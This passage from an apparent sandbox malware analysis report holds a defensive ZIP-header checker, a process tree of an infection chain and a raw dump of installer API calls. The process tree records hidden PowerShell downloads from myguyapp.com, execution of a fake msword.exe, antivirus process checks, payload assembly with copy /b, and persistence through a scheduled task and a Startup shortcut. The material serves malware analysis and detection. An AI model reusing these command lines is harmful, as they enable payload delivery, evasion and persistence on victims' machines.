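    if hdr.flags & FLAG_ENCRYPTED:
        findings.append("entry is encrypted (password-protected archive)")
    if hdr.flags & FLAG_DATA_DESCRIPTOR:
        findings.append("sizes deferred to a data descriptor (streamed archive)")
    if dropped_file_size is not None and hdr.uncompressed_size == dropped_file_size:
        findings.append("uncompressed size matches the dropped file (%d bytes)" % hdr.uncompressed_size)
    declared = int(headers.get("Content-Length", "0"))
    if declared and declared < 30 + len(hdr.filename) + hdr.compressed_size:
        findings.append("Content-Length smaller than the first entry; archive is truncated")
    return findings


if __name__ == "__main__":
    header = parse_local_file_header(CAPTURED_ZIP_PREFIX)
    print(header)
    for finding in assess_archive_download(CAPTURED_RESPONSE_HEADERS, CAPTURED_ZIP_PREFIX,
                                           DROPPED_MSWORD_EXE_SIZE):
        print("-", finding)
```

Run against the captured prefix, the parser reports an uncompressed size of 1'328'655 bytes, exactly the size of the msword.exe that Target ID 13 later executes, and a DOS modification time of 2025-01-07 04:47:36 on the packer's clock, which is unrelated to the Last-Modified header the Apache server sent. Checking the local file header only needs the first few hundred bytes of the body, so this kind of test can run on a proxy before the download completes; note that the local header's sizes are untrusted input and are only cross-checked, never used to allocate.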



                                                                  Target ID:0
                                                                  Start time:12:12:54
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:mshta.exe "C:\Users\user\Desktop\c2.hta"
                                                                  Imagebase:0x910000
                                                                  File size:13'312 bytes
                                                                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:12:12:57
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:12:12:57
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:12:12:57
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
                                                                  Imagebase:0xa80000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:12:13:00
                                                                  Start date:07/01/2025
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
                                                                  Imagebase:0x7ff6bc1b0000
                                                                  File size:5'641'176 bytes
                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:6
                                                                  Start time:12:13:00
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
                                                                  Imagebase:0xa80000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:12:13:01
                                                                  Start date:07/01/2025
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                  Imagebase:0x7ff74bb60000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:12:13:02
                                                                  Start date:07/01/2025
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2044 --field-trial-handle=1728,i,16385498434607258670,18278990784431365219,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                  Imagebase:0x7ff74bb60000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:11
                                                                  Start time:12:13:11
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                                                  Imagebase:0xa80000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:12:13:13
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:msword.exe
                                                                  Imagebase:0x400000
                                                                  File size:1'328'655 bytes
                                                                  MD5 hash:5BF20E8953B3219CD4F60BE10A73509F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 8%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:12:13:13
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:12:13:13
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:12:13:14
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 10
                                                                  Imagebase:0x810000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:12:13:16
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:12:13:16
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:12:13:18
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0xed0000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:12:13:18
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                  Imagebase:0x6b0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:12:13:19
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0xed0000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:12:13:19
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                  Imagebase:0x6b0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c md 361684
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:extrac32 /Y /E Approaches
                                                                  Imagebase:0x770000
                                                                  File size:29'184 bytes
                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /V "Korea" Measurement
                                                                  Imagebase:0x6b0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:12:13:21
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Propose.com U
                                                                  Imagebase:0xc50000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:false

                                                                  Target ID:31
                                                                  Start time:12:13:21
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:choice /d y /t 5
                                                                  Imagebase:0xa80000
                                                                  File size:28'160 bytes
                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:34
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                  Imagebase:0x8a0000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:35
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:36
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:37
                                                                  Start time:12:13:23
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                  Imagebase:0x7ff64f150000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:38
                                                                  Start time:12:13:24
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                  Imagebase:0xc70000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:39
                                                                  Start time:12:13:34
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                  Imagebase:0x7ff64f150000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:40
                                                                  Start time:12:13:34
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                  Imagebase:0xc70000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:18.6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:20.7%
                                                                    Total number of Nodes:1525
                                                                    Total number of Limit Nodes:33
4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 
4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 
4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 
